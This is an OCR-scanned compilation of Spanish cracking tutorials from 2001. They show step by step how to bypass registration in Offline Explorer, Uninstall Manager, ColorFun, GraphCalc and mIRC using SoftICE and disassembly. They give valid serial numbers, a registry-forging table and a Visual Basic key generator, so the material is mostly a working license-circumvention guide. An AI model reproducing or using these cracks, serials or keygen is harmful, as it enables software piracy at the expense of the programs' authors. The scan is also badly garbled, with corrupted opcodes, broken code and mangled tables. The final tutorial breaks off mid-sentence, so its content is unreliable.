saludos a todos. antes que nada me presentare, soy cbto, este es mi primer tutorial, soy un newbie, y este es 


mi primer "logro". 


espero que esto ayude a alguien mas, ya que leyendo otros tutoriales y practicando mucho fue como triunfe 
sobre este programa. 


al atake 


bueno, primero cargamos el programa y lo miramos, lo evaluamos, y blah, blah, blah... 

ahora, vamos al menu "help", y en "about offline explorer" damos click 

nos sale una ventana con un mensaje diciendonos que podemos evaluar el programa por 30 dias, que despues hay que 
registrarse ....blah, blah, blah... 

hacemos click en "register", y en la siguiente pantalla metemos nuestros datos, en mi caso quedaran asi: 


registered user: cbto 
registration key: 123456 


asi que ahora le damos en 'ok', y....... ahhh!!!! que la ... una graciosisima ventana mandandonos a la goma diciendonos 
que no le atinamos. parece que adivinar no es la solucion, asi que tendremos que meterle mano, bueno, ya que.... 
volvemos a darle a "register", nuevamente le metemos nuestros datos, y antes de darle a "ok", abrimos el softice con 
ctrl-d, ponemos un bpx hmemcpy, y f5 para salir de nuevo al programa. 

ahora si, le damos a "ok", y entramos al softice. f5 nuevamente, y f12 hasta llegar al codigo del programa, eso lo sabras 
cuando en la ventana de codigo en la linea verde veas el nombre del ejecutable. desactivamos el bpx hmemcpy 
escribiendo bc 00 

damos f10 varias veces, y nos paramos en 004b7714. y por que ahi?, bueno por que ahi encontramos lo siguiente: 


:004b7714 es8£7b00000 call 004c2810 
:004b7719 84c0 test al, al 
:004b771b 7465 je 004b7782 


mmm, una call, un test, y un salto condicional, se ve medio sospechoso asi que entremos a husmear que hace esa call 
cuando estes encima de 004b7714, dale f8 para entrar en la call, y vamos pulsando f10. como veras hay una serie de 
comprobaciones (son un chingo!) asi que adelante (por que no?). 

seguimos con f10 hasta llegar a: 


:004c29fd 8b45f8 mov eax, dword ptr [ebp-08] 


ahi escribimos d edx, y mira la ventana de datos...que bonito!!, que barbaridad!!, es un numero algo extraño, asi que 
por que no lo apuntamos? 

si unas lineas antes de llegar a 004c29fd, te paras en los mov, y escribes d edx, y d eax, veras que en la ventana de 
datos aparece el nombre que pusiste, y tambien otros nombres (li lu, john john, hambo/core, demonsoft, etc...). parece 
que el programa compara tu nombre con alguno de estos, por si las dudas yo creo... 

en fin, ya tenemos un numero que a mi gusto se parece mucho a un serial, asi que salimos del softice, volvemos a 
poner nuestro nombre y el numero que encontramos y.... 

¡perfecto, tenemos un numero valido para nuestro nombre! 


pues parece que este programa nos pela los dientes ya que hemos logrado nuestro objetivo 


algunos datos mas 


el numero es tipo XXXXXX-XXXXXXXXX-XX, la parte de enmedio, a veces son 8 y a veces son 9 digitos (lo probe con 
varios nombres), y la parte final son 2 letras 


si eres del tipo curioso, prueba a desensamblarlo, esta comprimido, asi que necesitaras el gettyp y el procdump. 
intentalo, y podras ver lo que te comentaba de los nombres. 


tu nombre y numero de registro lo guarda en: hkey_usersl.defaultisoftwarelmetaproductstoffline exploreniparameters. 
si borras esas claves, desregistraras el programa, y podras practicar algunas veces mas con otros nombres. 


bueno pues... 


como lo dije al principio, soy un newbie, y me costo bastante lograrlo, pero lo logre...ya saben, en la vida lo unico facil 
es que te den un par de patadas, asi que mis agradecimientos a: 


e mr. mauve 
e maniacpc 
e al 'anonymous' que no dejo su nick en el foro :) 


ustedes me ayudaron muchisimo con sus consejos... gracias. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Uninstall Manager ver. 3.0.0 


PROTECCION: Name/Registration Key. 


Obtener Registration Key (Número Serie) válido para registrarnos 
y Crear un Generador de Claves en Visual Basic. 


Numega SoftlIce 4.05, file insPEctor 3.5 (o similar), Dede v2.34, 
W32Dasm v8.93 (opcional), Visual Basic 6 


INTRODUCCION 


"año nuevo victima nueva” jejeje;) antes de entrar en materia, felicitaros a todos el nuevo año! desde la vieja iruña, 
zorionak eta urte berri on!!! bueno, vayamos al grano con esta nueva "victima" llamada uninstall manager 3.00. 


programa para desinstalar y eliminar programas de nuestro sistema de la empresa nokta software copyright O 1999- 
2000. 


antes de comenzar el atake, hay que tener claro, las herramientas que vamos a emplear, en esta "victima" 
emplearemos en una primera aproximación una herramienta llamada file inspector 3.5 - viper[k-for], nos dirá si 
nuestra "victima" esta empaquetada, compilador, etc, ... toda esta información nos ayudara para un atake más rápido. 


pues, nada vamos al aaaaaattttttanacanaakkkkkkkkeeeeee 


arrancamos el file inspector 3.5 y cargamos nuestra "victima" y observamos lo siguiente en pantalla: 


2, file insPEctor v3.5 - ViPER[K-FoR] 


<A Datos PE Eg Secciones | $ Importaciones/Exportaciones 
Gi] Compilador | E) Herramientas ]  <%Modficar |] acercado... 


Reconocimiento de signaturas 


Compilador: Borland Inprise Delphi 4 


Signatura: 


Versión de la DLL: fi 0 Información. .. ED Enviar signatura... 


Versión del enlazador: [2.25 Versión de la imagen: fo.o 
Versión del 50: fi 0 Versión del subsistema: f4.0 


E3 Abrir archivo... (£Y Analizar 


pues ya esta, nos dice que el uninstall manager 3.00 esta realizado en borland/inprise delphi 4. 


el siguiente paso será, emplear la herramienta dede v2.34 [dafixer] un excelente desensamblador para delphi, bien ejecutamos el 
dede y seleccionamos nuestra "victima" - uninstall manager 3.00 y pulsamos el botón [process] esperamos hasta que nos aparezca 
el mensaje "dump successful !:)'' y observaremos lo siguiente: 


 ¡DeDe v2.34 (c) 1999-2000 by DaFixer 
File Dumpers Tools Options ¿About 


je: 4UMsUninsman.exe y ] 5] Pa | uninsman 
[ 


Classes Info | Forms ¡[Procedures | Project | Exports | 
TAboutBox 


TáboutB ox Comval 
TExtrabox | Events | ontrols | 
Tocheckwiz 

TForrn1 


TWizbox FormCreate 004745D4 0011 
OKBtnClick 00474 9BC 0011 
Button1 Click 00474EDO 0013 
GetYolumelnto 0047446C 0014 
decode 00474380 D000D 


Ready 4 sec. ¡Uninsman.exe 1743936 bytes 


por donde empezamos a tracear? pues, muy fácil, si nos fijamos en el proceso que sigue para registrarnos, el propio programa 
"victima" nos da la respuesta. primero nos aparecerá la típica pantalla de información about uninstall manager con dos botones, 
[register] y [ok], pulsamos el botón [register] y nos aparecerá la ansiada pantalla de "registration" pidiéndonos, lo siguiente: 


NOVA A SORA ATL 


Registration Name 
Registration Key 


Register Online 


pues, ya esta, regresamos al dede v2.34 si pulsamos sobre about nos aparecerá como vemos en la imagen cinco eventos, ahora 
pulsamos con el botón derecho del ratón sobre button1click nos aparecerá un menú y seleccionamos show additional data 
apareciéndonos la siguiente información: 


button1 click 


event = onclick 
owner = button1(tbutton) 
caption = 'register' 


lo normal sería tracear el evento button1 click pero no es lo correcto;) si nos fijamos hay otro evento con un nombre muy muy muy 
curioso decode;) 


vamos a tracearlo, hacemos dobleclick sobre el evento decode y vemos el siguiente código: 


ei taboutbox.decode 


00474380 55 push ebp 
00474381 Sbec mov ebp, esp 
00474383 33c9 xor ecx, ecx 
00474385 51 push ecx 
00474386 51 push ecx 
00474387 51 push ecx 
00474388 51 push ecx 
00474389 53 push ebx 
0047a38a 56 push esi 
0047a38b 57 push edi 
0047a38c Sbf0 mov esi, eax 
0047a38e 33c0 xor eax, eax 
00474390 55 push ebp 


* possible string reference to: "¿O*gyéG4_'[<á]iruaridyyysv %oui<etiéá»py3auh Yg 
| 
00474391 685ba44700 push $0047a45b 


ES try 


| 

00474396 64130 push dword ptr fs:[eax] 
00474399 648920 mov fs:[eax], esp 
0047a39c 33db xor ebx, ebx 

0047a39e Sd55f4 lea edx, [ebp-$0c] 


* possible reference to control 'editl:trichedit' 


0047a3a1 8b86f4020000 mov eax, [esi+$02f4] ¡carga puntero 

0047a3a7 eSbcó6afbff call 00430€68 

0047a3ac 837df£400 cmp dword ptr [ebp-$0c], +$00 ;es el último caracter? 
0047a3b0 747e jz 00474430 ¡si = 0 salta 00474430 

0047a3b2 Sd55fc lea edx, [ebp-$04] 


* possible reference to control 'editl:trichedit' 


| 

0047a3b5 8b86£4020000 mov eax, [esi+$02f4] 
0047a3bb eSaScafbff call 00430€e68 

0047a3c0 Sb45fc mov eax, [ebp-$04] 

0047a3c3 eScc9af8ff call 00403894 

0047a3c8 Sbf8 mov edi, eax 

0047a3ca Sd55f0 lea edx, [ebp-$10] 

0047a3cd 8b45fc mov eax, [ebp-$04] 

0047a3d0 eSe7e1f8ff call 004085bc 

0047a3d5 Sb55f0 mov edx, [ebp-$10] 

0047a3d8 8Sd45fc lea eax, [ebp-$04] 

0047a3db e8d098f8ff call 00403cb0 

0047a3€e0 33db xor ebx, ebx ;ebx = 0 

0047a3e2 85ff test edi, edi ¡comprueba si edi=0 
0047a3e4 7e20 jle 00474406 ;si <= salta 00474406 
0047a3€6 b801000000 mov eax, $00000001 ;¡eax=1" caracter 


0047a3eb 8b55fc mov edx, [ebp-$04] 

0047a3ee 8a5402ff mov dl, byte ptr [edx+eax-$01] 

0047a312 80fa20 cmp dl, $20 ¡comprueba si es blanco (20h=32) 
0047a3£5 740b jz 00474402 ;si = 0 salta 00474402 

00474317 8b4dfc mov ecx, [ebp-$04] ¡copia puntero de nuestro name 
0047a3fa 81e2f£f000000 and edx, $000000ff ¡suma lógica (edx = edx + ffh) 
0047a400 03da add ebx, edx ¡ebx = ebx + edx 

00474402 40 inc eax ¡siguiente caracter 

00474403 4f dec edi ¡decrementa contador 

00474404 75€e5 jnz 0047a3eb ;si <> 0 salta 0047a3eb 

00471406 811£389000000 xor ebx, $00000089 ;xorea ebx con 89h(=137) 
0047a40c 831333 xor ebx, +$33 ;xorea ebx con 33h(=51) 

0047a40f 43 inc ebx ;ebx = ebx + 1 

0047a410 8d55f8 lea edx, [ebp-$08] 


* possible reference to control 'edit2:tedit' <eomocmocicnncanmamas registration key 


| 

00471413 8b86f3020000 mov eax, [esi+$02f8] 

0047a419 eS4a6afbff call 00430€68 

0047a41e Sb45f8 mov eax, [ebp-$08] 

0047a421 eSeee4fSff call 00408914 

00474426 3bd8 cmp ebx, eax ¡compara ebx(key válido) con eax(key dummy) 
0047a428 7504 jnz 0047a42e ;si no es zero (ebx<>eax) ''mal chico'' salta a 0047a42e 
0047a42a b301 mov bl, $01 ;si es zero (ebx=eax) correcto * registered * 
0047a42c eb02 ¡mp 00474430 ¡salta a 00474430 

0047a42e 33db xor ebx, ebx ;ebx = 0 

00474430 33c0 xor eax, eax ¡eax = (0) 

00474432 5a pop edx ;restaura edx 

00474433 59 pop ecx ¡restaura ecx 

00474434 59 pop ecx ¡restaura ecx 

00471435 648910 mov fs:[eax], edx 


ES finally 


* possible string reference to: ''<á_"[<áJaruaridyyysv«¡%ouii<eitá>0y3auh Yg" 


00471438 6862444700 push $0047a462 
0047a43d 8d45f0 lea eax, [ebp-$10] 
00474440 eSd397f8ff call 00403c18 
00474445 8d45f4 lea eax, [ebp-$0c] 
00474448 eScb97f8ff call 00403c18 
0047a44d 8d45f8 lea eax, [ebp-$08] 
00474450 ba02000000 mov edx, $00000002 
00474455 eSe297f8ff call 00403c3c 
0047a45a c3 ret 

0047a45b e94092f8ff ¡mp 00403640 
00474460 ebdb ¡mp 0047a43d 


== end 


| 

0047a462 8bc3 mov eax, ebx 
00474464 5f pop edi 
00474465 5e pop esi 
00474466 5b pop ebx 
00474467 8be5 mov esp, ebp 
00474469 5d pop ebp 
0047a46a c3 ret 


ei taboutbox.decode 


(1) estudio de la rutina de generación del key 


utiliza 2 variables, una de ellas almacena el texto original introducido, la otra lo transforma en minúsculas para obtener el reg 
key. comprueba si el primer carácter es blanco sino va extrayendo carácter a carácter y suma el valor ascii de cada uno de ellos 
hasta el final de la string$. es un bucle que comienza en 0047a3eb hasta 00472404 en el que monta la primera parte del número 
de registro. 


cuando termina de recorrer todo el nombre, sigue en 00474406 y xorea el resultado con el número 89h = 137 y el resultado 
obtenido lo xorea con el número 33h = 51, y el resultado lo suma con el número 1h. quitamos blancos a la string$ y obtenemos 


el *registration key valido*. 


si miramos unas líneas más abajo, vemos que hay una comparación entre ebx y eax que es evaluada en la siguiente línea 
haciendo un salto a 00474428 en caso de que no son iguales. 


si son iguales, mueve un 1 a bl, en la línea 0047a42a 


ojo! solo visualiza 27 caracteres en la pantalla about. 


(ii) estudio de la rutina de generación del key -regedit.exe- 


estudiando el comportamiento del uninstall manager a través del regedit.exe de micro$oft windows 9x, observamos un campo 
clave llamado reg donde almacena el nombre registrado. 


hkey_current_userisoftwarelnoktasoftwareluninstallermanager 
por ejemplo, para el registration name : erOser almacenara en el campo clave reg : ¡Qmzh(mz. 


si empleamos el registration name : +erOser'2000 almacena en el campo clave reg : ¡QHmzh(mz/:888 y si repetimos con el 
registration name : +erCOser obtenemos el reg : ¡O%mzh(mz. 


podemos observar que en estos 3 casos se repite la cadena "'¡O" - esta cadena indica al programa que estamos registrados, por 
tanto podemos jugar directamente con el regedit, empleando la tabla de caracteres (de abajo). 


a partir de los datos de esta "tabla de carácteres" podemos construirnos una pequeña utilidad, que atake directamente al campo 
clave reg almacenando la string$ correspondiente al name introducido;). 


tabla de caracteres uninstall manager v3.0.0 


(alt+65) a =i (alt+73) (alt+165)1 = u (alt+235) (alt+49) 1 = 9 (alt+57) (alt+164) ñ = ú (alt+73) (alt+111) o = g (alt+103) 


(alt+66) b = j (alt+74) | (alt+79) o = g (alt+71) | (alt+50) 2 = : (alt+58) (alt+98) b = j (alt+106) | (alt+112) p = x (alt+120) 
(alt+68) d =1 (alt+76) | (alt+81) q = y (alt+89) (alt+52) 4 =< (alt+60) | (alt+100) d=1 (alt+108) | (alt+114) r =z (alt+122) 
(alt+70) f=n (alt+78) (alt+83) s = [ (alt+91) (alt+54) 6=> (alt+62) | (alt+102)f=n (alt+110) (alt+116) t =| (alt+124) 
(alt+71) g=0 (alt+79) — | (alt+84) t=1(alt+92) (alt+55) 7 =? (alt+63) | (alt+103)g=o0 (alt+111) (alt+117) u =) (alt+125) 

| (alt+72) h=G (alt+64) | (alt+85)u=](alt+93) | (alt+56)8=0(alt+48) | (altr104)h=" (alt+96) | (alt+118) v=- (alt+126) 


(alt+119) w = €127; 
(alt+127) 


(alt+74) j = b (alt+66) (alt+87) w = _ (alt+95) (alt+48) 0 = 8 (alt+56) (alt+106) j = b (alt+98) (alt+120) x = p (alt+112) 
(alt+75) k = c (alt+67) (alt+88) x = p (alt+72) (alt+107) k = c (alt+99) (alt+121) y = q (alt+113) 


(alt+73) i = a (alt+65) | (alt+86) v = * (alt+94) | (alt+57) 9 = 1 (alt+49) (alt+105) i = a (alt+97) | 


(alt+76) 1 = d (alt+68) | (alt+89) y = q (alt+73) (alt+108) 1 = d (alt+100) | (alt+122) z = r (alt+114) 
(alt+77) m = e (alt+69) (alt+90) z = r (alt+74) (alt+109) m = e (alt+101) 
(alt+78) n = f (alt+70) (alt+110) n = f (alt+102) 


* caracteres especiales * 

| (alt+32) =((alt+40) | (alt+33)!=(alt+32) — | (alt+221)|=t(alte116) | — (alte35)”=(alt+32) | (alt+34)"=) (altt4) 
(alt+64) O =h (alt+72) | (alt+35) “="4(alt+172) | (alt+33)-=* (alt+42) (alt+35) H=+ (alt+43) — [| — (alt+44),= $ (alt+36) 
(alt+36) $=¿ (alt+168) | (alt+170) ==X(alt+207) | (alt+59);=3 (alt+59) (alt+37) % =, (alt+44) — | (alt+94) ” =v (alt+86) 


(alt+46) . = 2 (alt+58) (alt+38) 8: =- (alt+45) (alt+42) * = " (alt+34) (alt+58) : = _ (alt+95) (alt+33) /=. (alt+46) 
(alt+128) q =1 (alt+216) (alt+45) - = % (alt+37) (alt+40) (=" (alt+39) (alt+135) q =1 (alt+139) (alt+95) _ = w (alt+87) 
(alt+41) ) =! (alt+33) (alt+96) * =h (alt+104) | (alt+60) <= 4 (alt+52) (alt+33) == 5 (alt+53) (alt+43) + =+f (alt+35) 


(alt+62) > = 6 (alt+54) (alt+33) ? =7 (alt+55) (alt+91) [ = s (alt+83) (alt+167) * =2 (alt+253) (alt+33) ¿ =- (alt+46) 
(alt+93) ] =u (alt+85) — | (alt+166)*=¿ (alt+189) | (alt+39) '=/(alt+47) (alt+125) ) =u (alt+117) | (alt+92)1=t (alt+84) 


(alt+173) ¡ = O (alt+184) (alt+123) [ = s (alt+115) 


* key generator uninstall manager 3.00 en visual basic 6 * 


un saludo! 


+erOser'2000 
for the new millennium 


' nombre : uninstall manager 3.0 keygenerator 
' autor : +erOser'2000 [for the new millennium] 
' creado : lunes, diciembre 25,2000 > 6:45:22 pm (vers: 1.0.0000) 
' herramientas: softice 4.05, dede 2.34, visual basic 6 


' descripción : uninstall manager ver. 3.00 


private sub textl_change() 
dim user_namel$, user_name2$ 
dim key!, x!, 1! 
user_namel = trim$(textl.text)xt) 'quitamos blancos 
user_name?2 = Icase$(textl.text) t) 'y en minúsculas 
l] = len(user_namel) 
key =0 
forx=1tol 
if mid$(user_name?2, x, 1) <> "' " and 1 <= 27 then 'distinto de blanco y 
user_namel = asc(mid$(user_name?2, x, 1)) 'restringimos name a 27 caracteres 
key = key + user_namel 'textl.textbox maxlength = 27 
end if 
next x 
key = key xor £h898 'xor ebx, 00000089 
key = key xor €¿h334 'xor ebx, 00000033 
key = key + £h18 "inc ebx 
text2.text = key 
end sub 


-=ANW- your mind is the power -/VV=- 


om ++ agradecimientos +--=-- - 


karpoff, demian, black fenix, prOfesor x, numit_or, esiel 2, mr. crimson, mr. white, mr. green, tnt, wkt, kut y a todos los crackers 


del pasado, presente y futuro. 
mmm Hom E Hem - 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa 


y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


ColorFun v1.3 Build 2.28.10.00 


Serial, Limitacion de 7 dias. 
Encontrar un numero de registro. 
Juego tipo tetris 

Facililla. 


http://jaibosoft.8m.com/colorfun/index.htm 


Softice 


Pedrolas N2 4 FECHA: 16/01/2001 


introduccion 


colorfun v1.3 build 2.28.10.00 es un jego tipo tetris en el que tienes que hacer 3 o mas figuras en raya y 


asi ganar puntos. 


al atake 


cuando abrimos por primera vez el programa nos encontramos con la siguiente pantalla de bienvenida: 


ColorFun Registration Reminder ES! 


Two games. only for. $19.90 11 
Dr three games only for $24,901. 


This program is shareware. You can try it for 7 days and should 
register to continue using il after this period. The registration tee 
1s only $14.90 (US Dollars] Registration benefits: 
-the Registration Reminder screen remove: 
+ you can send pour results to the Intermet Table 11 
-0y temaih a registered user foral future versions ol ColorFun 
Also you can get TWO GAMES only for $19.90 | 
Or THREE GAMES only for $24.90 111 For more info. press bulton, 
For more information press: button" "How to Register ColorFun?" 
For Online Registration press button "Online Registration". 

You are on D day of your 7 days trial period 


y Please enter your personal Registration Code 


Your Name: | , 
Register 


Your Registration Lode 


AAA, 


en ella podemos ver que solo tenemos 7 dias para evaluar el programa y un poco mas abajo vemos el lugar donde 
tenemos qye poner nuestro nombre y numero de registro. 
yo lo he rellenado de esta manera: 
name: pedrolas 
code: 12345678 
he puesto 8 numeros intencionadamente por una cosa que luego os explicaré. llegado a este punto pulsamos "register 
y nos sale una ventanita que nos informa que el numero introducido no es bueno. 


ColorFun 


: IN ERRADA! Incorrect Registration cade. Please try again 


volvemos a rellenar el name y code con lo mismo de antes, abrimos el softice y ponemos un breakpoint a la funcion 
hmemcpy, esto es: 

bpx hmemcpy enter 

y luego f5. 

volvemos al programa y pulsamos "register" de nuevo, y zassss, salta el softice. pulsamos f11 y luego f12 un monton 
de veces hasta que llegamos a la siguiente linea: 


0042c350 mov edx,[esi+7c] 

0042c353 lea edi,[esi+7c] 

0042c356  cmp dword ptr [edx-08],08 <---comprueba que el codigo sea de 8 cifras 
0042c35a jz 0042c3a7 


pulsamos f10 y cuando llegamos al salto jz seguimos dandole a £10, ahora comprueba que los caracteres del codigo 


sean numeros, asi que os hartareis de darle a £10, y seguis dandole hasta que aparezca la siguiente linea: 


0042c5a5 call 0042c810 <-- pulsamos f8 para entrar en la call 
0042c5aa test eax,eax 
0042c5ac ¿nz 0042c5e7 


cuando entramos en la call caemos en la siguiente linea: 
0042c810 push ff 
seguimos dandole a £10, hasta que aparece lo siguiente: 


0042c8aa cmp eax,012c8274 <--- compara nuestro 12345678 con el 012c8274 en hexadecimal 
0042c8af jnz 0042c8da 


ponemos ?012c8274 y el softice nos devuelve la siguiente cifra: 19694196, un numero de registro valido. 
si seguimos dandole a f10 caemos en la siguiente linea: 


0042c8da cmp eax,051db10b 
0042c8df jnz 0042c90a 


joder, otro numero, el 051db10b = 85831947 
podeis seguir sacando numeros continuamente, ya que tiene hasta 100 numeros de registro fijos. 
llegados a este punto, ponemos bc* y luego f5 para salir del softice. 


colocamos el numero que hemos obtenido en el registro del programa y conseguimos la siguiente pantalla: 


ColorFun 


(E) Thank pot for support 
Now. you can send your results to the Internet table | 


y esto es todo amigos...... 


bilbao, a 16 de enero de 2001 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: GraphCalc v3.1 

PROTECCION: Serial. 

Objetivo: Encontrar un numero de registro. 

Descripcion: Programa para hacer graficas en 2D y 3D 

Dificultad: Newbie. 

DOWNLOAD : http://www.graphcalc.com/ 

Herramientas: Softice 

CRACKER: Pedrolas N* 5 FECHA: 17/01/2001 
introduccion 


graphcalc v3.1 es un programa que sirve para resolver ecuaciones, dibujar gráficas de ecuaciones tanto en 2d 
como en 3d. 


como ingeniero industrial que soy me ha agradado mucho encontrarme con este programa, espero que os 
guste a vosotros tambien como lo ha hecho a mi. 


al atake 


comenzamos abriendo el programa y vemos que a la hora de hacer determinadas cosas con el programa no nos deja, 
sacando una ventana que nos dice que nos tenemos que registrar. 


vamos al menu "help" y le damos a "register". entonces nos sale la siguiente pantalla: 


Register 


Name [Pecrolas 
Registration Code [ 23456789 


coa_| 


que la rellenamos con nuestros, en mi caso he puesto: 


name: pedrolas 2001 
registration code: 123456789 


como es obvio el programa no traga y nos avisa de que el numero es incorrecto: 


Unregistered Version of GraphCale 


Q Invalid Registration Code 


volvemos a rellenar los datos de la misma manera, pero antes de darle al ok, le damos ctrl+d y ponemos en el softice 
bpx hmemcpy 
pulsamos enter y luego f5 


ahora le damos a ok y salta el softice, pulsamos f11 y luego f12 hasta que aparezca que estamos en el graphcalc, 
entonces le damos a £10 hasta que aparezca la siguiente linea: 


004a4b89 pop esi 


le damos un d ecx y vemos que sale nuestro nombre, pero si le damos a e ecx y en la ventana de datos bajamos un poco 
nos encontraremos con el codigo de registro: 


1kb88eev9ujbw, le quitamos el jpw y ya tenemos nuestro numero de registro, por tanto rellenamos la pantalla de 
registrarnos de la siguiente manera: 


name: pedrolas 
registration code: 1kb88eev9u 


entonces le damos a ok y nos sale la siguiente pantalla: 


Thank You 


ui) Thank you for registering GraphCale 


ya tenemos el programa registrado. 


bilbao, a 17 de enero de 2001 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


INTRODUCCION 


. qué onda raza!!! como que estos últimos días de vacaciones nos obligan a trabajar 
un poco mas, y es por esto que su amigo ”[glole[e]? regresa. okas, esta vez traigo un 
objetivo que se puede catalogar como nivel medio, pues si, medio porke rekiere que 
puedas manejar mas el asm, pero lo trataré de poner fácil, ya que comprendo que no 
solo crackers medios y elite podran ejecutarlo, ademas, la información es un derecho, 
la info es conocimiento, y el conocimiento es poder. okas, yo utilizaré mirc v.5.7, la 
verdad es que me gusta mucho chatear, así que lo conseguí, es mejor con el x-cript 
(ke valga la propaganda, poke no me pagan). 

okillas, pueden descargar el x-cript con mirc incluido en la página del x-cript 


let's work, digo, 
trabajemos 


que encontraras akí : 


1)buscando algo útil 


2)herramientas 


3) manos a la obra 


3)despedida 


1)buskando algo útil 


. Okas, de ahora en adelante, debes meter en tu cabecita lo siguiente: "conoce a tu enemigo y lo venceras 
facilmente". lo kiero darte a enteder con esto, es que debes tratar de comprender el comportamiento 
de tu enemigo, ve a la ventana help, luego a register, e ingresa lo ke kieras, yo lo haré así: 


mliRC Registration Xx] 


Full Name: 


[TalisO LvS KaRi 


Registration Code: 


fos 1-99 


| 
How to register 
Cancel | 


le damos register, y nos topamos con un mensaje ke dice: "sorry, your registration..." 


bueno, aparte de esto, el mirc es uno de los mejores programas para chatear, y con un buen script, 
mucho ke mejor. 


2) herramientas 


utilizaremos w32dasm para ver algunas partes interesantes del código. 
softice (cualquier versión, yo uso la 4.05). 
cerebro, papel y una pluma (lapicero, boligrafo, etc). 


3) manos a la ubre, digo, a la obra!!! 


okas, al inicio dije que sería un poco mas difícil, pero vamos a hacerlo paja (fácil), abrimos el mirc 
en w32dasm y despues de un buen rato, aparece, buscamos la cadena "sorry.....” y nos lleva al 
lugar, pero no vemos nada interesante (pensabas crackearlo nomas con un je/jne o un jz/jnz) así 
que vamos a algo mejor, vamos a la ventana de registro, ingresamos los datos necesarios pero sin 
presionar register. 


a esta altura, presionamos ctrl+d para ir a soft-ice, hay 2 formas de crackear esto, primero lo 
haremos fijando un: 


bpx getdlgitem | 


nada del otro mundo, ahora pulsas f5 o ctrl+d para regresar a windows, presionas el botón 
register y regresas al sice, bien, ahora presionas f11 para llegar al código del programa, hmmmm, 
no nos muestra el código sino el código de la api, bueno, no os preocupeis, f11 de nuez, y ahora 
si estamos alli, aterrizamos en una pieza de código que se vé así: 


* reference to:user32.senddlgitemmessagea,ord:0000h <---- api w32 que nos muestra la ventana de registro 
:00498a8b e841800500 call 004f0ad1 <----llama a la api que nos muestra la ventana de registro 
:00498a90 6833445000 push 00504a33 <----acepta el nombre/serial ingresados 

:00498495 6840465000 push 0050464c <----acepta el serial/nombre 

:0049829a eseSfbftftff call 00498684 <----llama una función para calcular y chequear el nombre/serial 
:00498a9f 85c0 test eax, eax <----tiene exito la prueba de registro o no 

:00498aa1 08490000000 je 00498b42 A A 
:00498a47 be3c9d4f00 mov esi, 004f9d3c 

:00498aac bf4c465000 mov edi, 0050464c 


bueno, si no entiendes, no hay clavinche, pero al haber presionado f11 2 veces, llegamos a la 
línea de código cuya dirección es "00498a76", k3wl1 no? pues sí, vamos por buen camino, ahora 


prepara tus dedos, que tendrás mucho trabajo que realizar con f10, tanto así que debes presionar 
f10 7 veces, cuando lo hagas, presiona f11 una vez, esto se debe a que el programa llama a una 
api, y aká nos lleva al código de la api, con el f11 regresas al código del mirc, si no, presiona otra 
vez f11. 

cuando hayas regresado al código del programa, presion f10 hasta que llegues a la dirección 
"00498a9a", la cual es un call, ahora presiona f8 (una sola vez). ahora llegarás a la dirección 
"00498684" presiona f10 hasta que llegues a la línea con dirección "004986e6" que también es 
una llamada, f8 para entrar en la llamada y luego f10 hasta llegar a la dirección "0049862a" (no 
te desesperes, debe hacer un largo chequeo, y retornará, pero luego si das demasiados f10, te 
perderás, así ke kalma pueblo. 


aka nos topamos con la primera parte de la rutina de chequeo, aca muestra la primera parte del 
s/n que ingresaste, pero recuerdas que el s/n que ingresé tenia un guión (-)? bueno, esto es 
porque 


:004985b1 e8c28cf6ff call 00401278 <----revisa si nuestro serial contiene un"-" 


bueno, quiza debí explicar antes esto, pero no le hace, okas, continuando, les decia que aca es 
donde se comparan el serial que ingresamos con el verdadero, que como lo se, vamos a verlo 
ahora: esto es una comparación en la que se comparan los números que están antes del guión, 
con los que genera el programa, en ebx estan los valores reales, y en ebp-04 los nuestros 
(aunque a mi me aparece un número nada que ver), okas, para ver el contenido usaremos el 
commando "d ebx" y chanananan.... wtf lo que aparece no es otra cosa que basura, 
buuuuuuuuuu, sos un maleta (ya me imagino a varios diciendolo, pero nada que ver) bueno, hay 
momentos en los que no podemos ver los contenidos con el commando dump, asi que 
utilizaremos otro commando, "? ebx" el cual se utiliza para evaluar el contenido, y encontramos 
que en mi caso, la primera parte de mi s/n es "10360", maravilloso, ahora solo keda ver la 
segunda parte, pero para hacerlo, debemos dejar que el programa nos muestre la ventana de 
error, así que f5 hasta que aparezca la ventana, y comenzaremos de nuevos. 


ahora, ingresamos otra vez nuestro nombre (para mí tanso lvs kari) y la primera parte de nuestro 
serial valido (10360-031199 ya saben por que siempre es el 031199) y de nuevo, presionamos 
register, seguimos todo el procedimiento anterior, solo que la ultima dirección a revisar, es decir 
donde se encuentra la comparación ya no será "0049862a", ahora la dejaremos llegar hasta 
"0049866a" y hacemos la evaluación, en este momento, ebx de nuevo almacena la parte de 
nuestro serial que nos interesa, y en ebp-08 esta lo que ingresamos. 


ahora tenemos nuestro serial completo, lo unico que nos queda, es unirl, en mi caso, el nombre 
es tanso lvs kari y el s/n completo es 10360-802802 


mIRC Registration! 
i) “Your registration has been entered successfully. 


Thanks for registering! :] 


presionamos aceptar, vamos de nuevo a help, y ahora nomas encontramos que dice about, le 
damos click, y vemos esto: 


About mIRC E 
miRCO v5.7 32bit 
An Internet Relay Chat Client 
Copyright Y 1995-2000 mIRC Co. Ltd. 
All Rights Reserved. 
Written by Khaled Mardam-Bey - 


| Licensed to: - Author! | 


TalNsO LvS KaRi 


Please visit the mIRC website for the latest version, 
hints and tips, and general IRC information. 


| _ http: ¿2 mirc.co.uk Visit 


4)despedida 


bueno raza, por hoy, esto es super, ya saben, si les gustaria que continuara escribiendo (digo, pa 
no sentirme tan mal) pues escribanme, ya sea que les haya gustado, o nomas pa decirme algo, 
aca estoy a su servicio (no lo tomen tan a pechos) y bueno, saludos a todos los amigos, karpoff, 
dek_oin, black fenix, etc. a mi amada kari, orale gente. si me quieren contactar, mi email es 
goleeuvOhotmail.com pd. se me olvidaba decirles, si kieren repetir el crack, se darán cuenta que si lo 
